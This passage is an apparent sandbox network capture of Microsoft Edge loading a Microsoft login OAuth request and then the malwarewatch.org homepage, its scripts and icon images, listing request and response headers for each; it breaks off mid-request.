GEThttps://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7&response_type=id_token+code&nonce=b031797f-09e1-4dfd-903a-acd835355b57&redirect_uri=https%3a%2f%2fwww.bing.com%2forgid%2fidtoken%2fconditional&scope=openid%20email%20profile%209ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7/.default&response_mode=form_post&instance_aware=true&msafed=0&prompt=none&state=%7b%22ig%22%3a%2269579D85EA2D4E95B5358DAB8D3A2EA2%22%7dmsedge.exeRemote address:20.190.160.14:443RequestGET /common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7&response_type=id_token+code&nonce=b031797f-09e1-4dfd-903a-acd835355b57&redirect_uri=https%3a%2f%2fwww.bing.com%2forgid%2fidtoken%2fconditional&scope=openid%20email%20profile%209ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7/.default&response_mode=form_post&instance_aware=true&msafed=0&prompt=none&state=%7b%22ig%22%3a%2269579D85EA2D4E95B5358DAB8D3A2EA2%22%7d HTTP/2.0
host: login.microsoftonline.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
pragma: no-cache
content-type: text/html; charset=utf-8
content-encoding: gzip
expires: -1
vary: Accept-Encoding
strict-transport-security: max-age=31536000; includeSubDomains
x-content-type-options: nosniff
p3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
x-ms-request-id: 00838386-b765-4e96-b6b9-920b05c94e00
x-ms-ests-server: 2.1.19962.6 - NEULR1 ProdSlices
report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://identity.nel.measure.office.net/api/report?catId=GW+estsfd+ams2"}]}
nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
x-ms-srs: 1.P
referrer-policy: strict-origin-when-cross-origin
content-security-policy-report-only: object-src 'none'; base-uri 'self'; script-src 'self' 'nonce-56gIIhX6nVOW7HfEcxTaYw' 'unsafe-inline' 'unsafe-eval' https://*.msauth.net https://*.msftauth.net https://*.msftauthimages.net https://*.msauthimages.net https://*.msidentity.com https://*.microsoftonline-p.com https://*.microsoftazuread-sso.com https://*.azureedge.net https://*.outlook.com https://*.office.com https://*.office365.com https://*.microsoft.com https://*.bing.com 'report-sample'; report-uri https://csp.microsoft.com/report/ESTS-UX-All
x-xss-protection: 0
set-cookie: buid=1.AXoAMe_N-B6jSkuT5F9XHpElWnmtoZ62_ZpPi8MrcPluNMcBAAB6AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEak9NdDFZq9rYkJAWoj1Qmb11h4_CMVGHmSwYLEHGLwWszQDloK9BiWJcEXuh7pP2IyXn3uEcY1_1NjQiSDNmU2nKiOoc92vzKhPzVhz5QqUgAA; expires=Sat, 01-Mar-2025 22:03:48 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: fpc=As68a_r9QjBIvMsVi3frDMmCeMQLAQAAAETuLd8OAAAA; expires=Sat, 01-Mar-2025 22:03:48 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQE36nLCzbWz6-vnP6cSefV_4sHbhHxYoWq8EB3vWA9sPGSONqKi07C5frBX-9FZ7ErIF1yX3LDuXUAQ4_rsmz-KBxEnciDzy3htWbgZdRcTg_d5-GBN7GLsot_vwE0jl2FifyYgsaa7BQy1UD06oAjpCdGixtOJ49rQGxnCsuqh-MgAA; domain=.login.microsoftonline.com; path=/; secure; HttpOnly; SameSite=None
set-cookie: x-ms-gateway-slice=estsfd; path=/; secure; samesite=none; httponly
set-cookie: stsservicecookie=estsfd; path=/; secure; samesite=none; httponly
date: Thu, 30 Jan 2025 22:03:48 GMT
content-length: 699
-
Remote address:8.8.8.8:53Requestwww.malwarewatch.orgIN AResponsewww.malwarewatch.orgIN A104.21.96.1www.malwarewatch.orgIN A104.21.64.1www.malwarewatch.orgIN A104.21.48.1www.malwarewatch.orgIN A104.21.32.1www.malwarewatch.orgIN A104.21.80.1www.malwarewatch.orgIN A104.21.112.1www.malwarewatch.orgIN A104.21.16.1
-
Remote address:104.21.96.1:443RequestGET / HTTP/2.0
host: www.malwarewatch.org
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: document
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/html; charset=utf-8
last-modified: Sun, 28 May 2023 15:38:52 GMT
vary: Accept-Encoding
cache-control: public, max-age=90, immutable
x-content-type-options: nosniff
cf-cache-status: DYNAMIC
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d5%2F4RZ%2BlWGZnlzrW3cEqd6wVcKF%2FSZQqDjtwzK3aaAeuDBntApMkVBWAQ25dg%2FkV3QNTPoQZSAgn5PKkiK8RFH%2B9peXeCTUNfSiK27V56GFKBpF9KP5yQ%2F43YA2v0oSf46HZ04OWGg%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server: cloudflare
cf-ray: 90a4c10fdc92eff1-LHR
content-encoding: br
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=52939&min_rtt=47003&rtt_var=21668&sent=7&recv=9&lost=0&retrans=0&sent_bytes=2833&recv_bytes=1172&delivery_rate=57099&cwnd=253&unsent_bytes=0&cid=28a8e2741a2c414b&ts=205&x=0"
-
Remote address:104.21.96.1:443RequestGET /styles/styles.css HTTP/2.0
host: www.malwarewatch.org
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/css,*/*;q=0.1
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://www.malwarewatch.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/css; charset=utf-8
last-modified: Mon, 18 Apr 2022 15:26:17 GMT
vary: Accept-Encoding
etag: W/"625d8319-4147"
cache-control: public, max-age=31536000, no-transform, immutable
x-content-type-options: nosniff
content-encoding: gzip
cf-cache-status: HIT
age: 470341
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D1yokNMrpOrDeGqVeGoBqWqopgNuF453eigBklEWA9CyCRFYi9%2Bi0zEE7vgdcclM61iaG%2BH2rrunX8cbw7MbJkVTrT7HHzIE%2BfsLFJ2pVgb14D0w3beWqbR3YoC%2FGzRXGmOpZmvPhQ%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server: cloudflare
cf-ray: 90a4c1113806eff1-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=51692&min_rtt=47003&rtt_var=14339&sent=12&recv=12&lost=0&retrans=0&sent_bytes=5495&recv_bytes=1298&delivery_rate=113585&cwnd=257&unsent_bytes=0&cid=28a8e2741a2c414b&ts=295&x=0"
-
Remote address:104.21.96.1:443RequestGET /scripts/videoList.js HTTP/2.0
host: www.malwarewatch.org
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.malwarewatch.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript; charset=utf-8
last-modified: Sat, 03 Apr 2021 19:42:50 GMT
vary: Accept-Encoding
etag: W/"6068c53a-5dc"
cache-control: public, max-age=31536000, no-transform, immutable
x-content-type-options: nosniff
content-encoding: gzip
cf-cache-status: HIT
age: 470340
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jXn5qmHJtMstJP08wMjVsDbKFSkJTuBdxwwojCsLtCsgRpE81towGStWjzdzZWHcZ0EI9XSQBfib5pYtnbCeoKZdeqRfild%2BKDULrlHdCZNP%2F6Yhxeifq2X955B0DyYizDhKBwhr6g%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server: cloudflare
cf-ray: 90a4c1119908eff1-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=50664&min_rtt=47003&rtt_var=7571&sent=18&recv=16&lost=0&retrans=0&sent_bytes=10057&recv_bytes=1375&delivery_rate=166639&cwnd=257&unsent_bytes=0&cid=28a8e2741a2c414b&ts=357&x=0"
-
Remote address:104.21.96.1:443RequestGET /scripts/sideBar.js HTTP/2.0
host: www.malwarewatch.org
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.malwarewatch.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript; charset=utf-8
last-modified: Sun, 25 Jul 2021 17:39:49 GMT
vary: Accept-Encoding
etag: W/"60fda1e5-5a6"
cache-control: public, max-age=31536000, no-transform, immutable
x-content-type-options: nosniff
content-encoding: gzip
cf-cache-status: HIT
age: 470340
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PKlxDJ%2FPfBMmkaS%2FQwg2EskUJ%2BScVV3uqiQofUrPMvzun3b8Y9W%2BG3RqcqBQVGbZjgL8lDbTFj%2F8w3sNdY14Zn1nQsk2tbGODyHdV%2FOleml9rrcTob8VpfnwvW6L9lczjp9fCSgV%2Bg%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server: cloudflare
cf-ray: 90a4c1130cd9eff1-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=55506&min_rtt=47003&rtt_var=15441&sent=21&recv=19&lost=0&retrans=0&sent_bytes=11201&recv_bytes=1441&delivery_rate=166639&cwnd=257&unsent_bytes=0&cid=28a8e2741a2c414b&ts=584&x=0"
-
Remote address:104.21.96.1:443RequestGET /images/logo.png HTTP/2.0
host: www.malwarewatch.org
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.malwarewatch.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: image/png
content-length: 157589
last-modified: Fri, 12 Feb 2021 15:48:58 GMT
etag: "6026a36a-26795"
cache-control: public, max-age=31536000, no-transform, immutable
x-content-type-options: nosniff
cf-cache-status: HIT
age: 18209
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A%2Fonbkm7Wvy%2BTXL4%2BQvtPll6vWFpVHH5Ya1jVaoyjZIPcFu39IPm3guOV00X3uRvAKmw6SuAPmZof3uG%2B0MGIHrTFMnj2QKXNb0LRDvdtPX0TOGNQ1nLyiPQxTdh6jYDN9Jn8SA6QA%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
vary: Accept-Encoding
server: cloudflare
cf-ray: 90a4c1134dc5eff1-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=55506&min_rtt=47003&rtt_var=15441&sent=26&recv=29&lost=0&retrans=0&sent_bytes=12206&recv_bytes=2175&delivery_rate=166639&cwnd=257&unsent_bytes=0&cid=28a8e2741a2c414b&ts=626&x=0"
-
Remote address:104.21.96.1:443RequestGET /images/icons/software.png HTTP/2.0
host: www.malwarewatch.org
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.malwarewatch.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: image/png
content-length: 3946
last-modified: Sun, 21 Feb 2021 16:41:46 GMT
etag: "60328d4a-f6a"
cache-control: public, max-age=31536000, no-transform, immutable
x-content-type-options: nosniff
cf-cache-status: HIT
age: 470341
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QHXBUZiTzPwDSBImbu7tDrdGceydZysCz9WTsXh%2BLQvdXqGJ51vxeW5GA%2B2UtRgr%2FxGRlAKgD4z7gtMrJNjqp9NdCHquC4a41Zv2POCnHdEAC8lqtcHs%2FRGQnTYfj8ERECJAaNcbIQ%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
vary: Accept-Encoding
server: cloudflare
cf-ray: 90a4c1134dffeff1-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=55506&min_rtt=47003&rtt_var=15441&sent=91&recv=29&lost=0&retrans=0&sent_bytes=94750&recv_bytes=2175&delivery_rate=166639&cwnd=257&unsent_bytes=46138&cid=28a8e2741a2c414b&ts=628&x=0"
-
Remote address:104.21.96.1:443RequestGET /images/icons/library.png HTTP/2.0
host: www.malwarewatch.org
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.malwarewatch.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: image/png
content-length: 4872
last-modified: Sun, 21 Feb 2021 18:30:23 GMT
etag: "6032a6bf-1308"
cache-control: public, max-age=31536000, no-transform, immutable
x-content-type-options: nosniff
cf-cache-status: HIT
age: 470340
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WzR3Tb9TW0%2FU7MO7Qzcux1WAQL74NK9toA1hqjEbi4tdA7j9S3DyPp71wZt%2FjbeKhn0nQZg6F0udaF7yrEEX%2FhABexbyyCKvS%2FfDb7LB19%2BBu7%2BunxyL46dk2UdAomHUiWeKOaO52A%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
vary: Accept-Encoding
server: cloudflare
cf-ray: 90a4c1134e0beff1-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=55506&min_rtt=47003&rtt_var=15441&sent=105&recv=29&lost=0&retrans=0&sent_bytes=113748&recv_bytes=2175&delivery_rate=166639&cwnd=257&unsent_bytes=27140&cid=28a8e2741a2c414b&ts=629&x=0"
-
Remote address:104.21.96.1:443RequestGET /images/icons/defrag.png HTTP/2.0
host: www.malwarewatch.org
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.malwarewatch.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: image/png
content-length: 3289
last-modified: Sun, 21 Feb 2021 17:07:14 GMT
etag: "60329342-cd9"
cache-control: public, max-age=31536000, no-transform, immutable
x-content-type-options: nosniff
cf-cache-status: HIT
age: 470340
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B%2BdnVPp30Xzx%2FrFHohvva0z9EGUfO3UAWPhoW%2FniX7Yjtwkteq0p6OQmiYZovJq%2FMYqsjLvlKIO5gVMI4y7yrt8lkpzpaFHVkmf5ZG3Q2tJwQC2PNqitwcxL%2FtooLp0y%2BV2YdD4xEA%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
vary: Accept-Encoding
server: cloudflare
cf-ray: 90a4c1134e1beff1-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=55506&min_rtt=47003&rtt_var=15441&sent=147&recv=31&lost=0&retrans=0&sent_bytes=170742&recv_bytes=2362&delivery_rate=166639&cwnd=257&unsent_bytes=11055&cid=28a8e2741a2c414b&ts=632&x=0"
-
Remote address:104.21.96.1:443RequestGET /images/icons/config.png HTTP/2.0
host: www.malwarewatch.org
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.malwarewatch.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: image/png
content-length: 1757
last-modified: Sun, 21 Feb 2021 17:02:00 GMT
etag: "60329208-6dd"
cache-control: public, max-age=31536000, no-transform, immutable
x-content-type-options: nosniff
cf-cache-status: HIT
age: 191551
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1%2F5aTK5a6hfzBXwbwsU6MdlqvIiAOGEBJCqQsk8iuE0eYa8aARBDKm9b6%2B9J21OwrOfDMQUsij1s5IbLGSJSrESJXV7eXQYl92H7qhXXXFuIi7brx1OlXy7SpITtmBimARW8xTR3eA%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
vary: Accept-Encoding
server: cloudflare
cf-ray: 90a4c1134e1aeff1-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=54512&min_rtt=47003&rtt_var=13569&sent=158&recv=32&lost=0&retrans=0&sent_bytes=185640&recv_bytes=2362&delivery_rate=166639&cwnd=257&unsent_bytes=0&cid=28a8e2741a2c414b&ts=632&x=0"
-
Remote address:104.21.96.1:443RequestGET /images/icons/help.png HTTP/2.0
host: www.malwarewatch.org
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.malwarewatch.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: image/png
content-length: 4030
last-modified: Sun, 21 Feb 2021 17:11:00 GMT
etag: "60329424-fbe"
cache-control: public, max-age=31536000, no-transform, immutable
x-content-type-options: nosniff
cf-cache-status: HIT
age: 470340
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MTVmzrThhApJJfphq6urMmKzSORSBcMZvVZ5pg6z%2BRisGMT80DNuxR6DDUPygDDZZC0vrmU77Uaqjv1Azx6zG5PytanZVw5XN5I%2FqnZ9Wmpjtv11C2SUIGqA00FrAxbpZjtkGV8xwQ%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
vary: Accept-Encoding
server: cloudflare
cf-ray: 90a4c1134e15eff1-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=54512&min_rtt=47003&rtt_var=13569&sent=160&recv=32&lost=0&retrans=0&sent_bytes=187941&recv_bytes=2362&delivery_rate=166639&cwnd=257&unsent_bytes=0&cid=28a8e2741a2c414b&ts=634&x=0"
-
Remote address:104.21.96.1:443RequestGET /images/icons/users.png HTTP/2.0
host: www.malwarewatch.org
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.malwarewatch.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: image/png
content-length: 3907
last-modified: Sun, 21 Feb 2021 18:30:12 GMT
etag: "6032a6b4-f43"
cache-control: public, max-age=31536000, no-transform, immutable
x-content-type-options: nosniff
cf-cache-status: HIT
age: 470340
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hjmnTnYZOx5e8kRHGrF6dVeIz2ADXkoJCV3OanacUwzgI86mE1jvxupSOd80RK0hGqBGl7tcFkWGzhgs4SF9MaIaP3ZJpItC6zK8Vh9B5f31VfyZUEvCHq%2FbULy418u7Cv%2FCbZK7Fg%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
vary: Accept-Encoding
server: cloudflare
cf-ray: 90a4c1134e10eff1-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=54512&min_rtt=47003&rtt_var=13569&sent=164&recv=32&lost=0&retrans=0&sent_bytes=192536&recv_bytes=2362&delivery_rate=166639&cwnd=257&unsent_bytes=0&cid=28a8e2741a2c414b&ts=634&x=0"
-
Remote address:104.21.96.1:443RequestGET /images/icons/youtube.png HTTP/2.0
host: www.malwarewatch.org
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.malwarewatch.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: image/png
content-length: 2624
last-modified: Sun, 21 Feb 2021 16:40:40 GMT
etag: "60328d08-a40"
cache-control: public, max-age=31536000, no-transform, immutable
x-content-type-options: nosniff
accept-ranges: bytes
age: 18208
cf-cache-status: HIT
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VhlIrBKMQN8KOYiRdjRlxi5w5Jg0AAKlp%2FIY%2B6HSiK5wQNFsEWxuw6KbIGAM1qb0h1HbEWtKwc40He0cBRUPo6AVuUx29RYgkJmk2cvzIIIbGCGNT3ZlA6atpXb4dDYC%2FTcow0n9vA%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
vary: Accept-Encoding
server: cloudflare
cf-ray: 90a4c1134e06eff1-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=54512&min_rtt=47003&rtt_var=13569&sent=168&recv=32&lost=0&retrans=0&sent_bytes=197114&recv_bytes=2362&delivery_rate=166639&cwnd=257&unsent_bytes=0&cid=28a8e2741a2c414b&ts=635&x=0"
-
Remote address:104.21.96.1:443RequestGET /images/icons/twitter.png HTTP/2.0
host: www.malwarewatch.org
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.malwarewatch.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: image/jpeg
content-length: 163022
last-modified: Sun, 17 Apr 2022 11:51:13 GMT
etag: "625bff31-27cce"
cache-control: public, max-age=31536000, no-transform, immutable
x-content-type-options: nosniff
cf-cache-status: HIT
age: 470340
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Sa5nbQpKD6ZZ1K4eoy%2FeQrFnS7CzjunuaVDtPOZWDY6FKOwwUpOxZ3PJVaIGPY28kNdjjXwblkkKQI5czpINpfl6vZNN1Jn2gwMpr3bFHBNMoPwcTjVv2SIJ5i0GHfDnmb2D8n2vPw%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
vary: Accept-Encoding
server: cloudflare
cf-ray: 90a4c1135e4beff1-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=54512&min_rtt=47003&rtt_var=13569&sent=171&recv=32&lost=0&retrans=0&sent_bytes=200334&recv_bytes=2362&delivery_rate=166639&cwnd=257&unsent_bytes=0&cid=28a8e2741a2c414b&ts=640&x=0"
-
Remote address:104.21.96.1:443RequestGET /images/icons/steam.png HTTP/2.0
host: www.malwarewatch.org
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.malwarewatch.org/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: image/png
content-length: 1292
server: cloudflare
accept-ranges: bytes
last-modified: Sun, 21 Feb 2021 17:04:28 GMT
etag: "6032929c-50c"
cache-control: public, max-age=31536000, no-transform, immutable
x-content-type-options: nosniff
cf-cache-status: HIT
age: 470340
cf-ray: 90a4c1134e18eff1-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:104.21.96.1:443RequestGET /images/backgrounds/background.jpg HTTP/2.0
host: www.malwarewatch.org
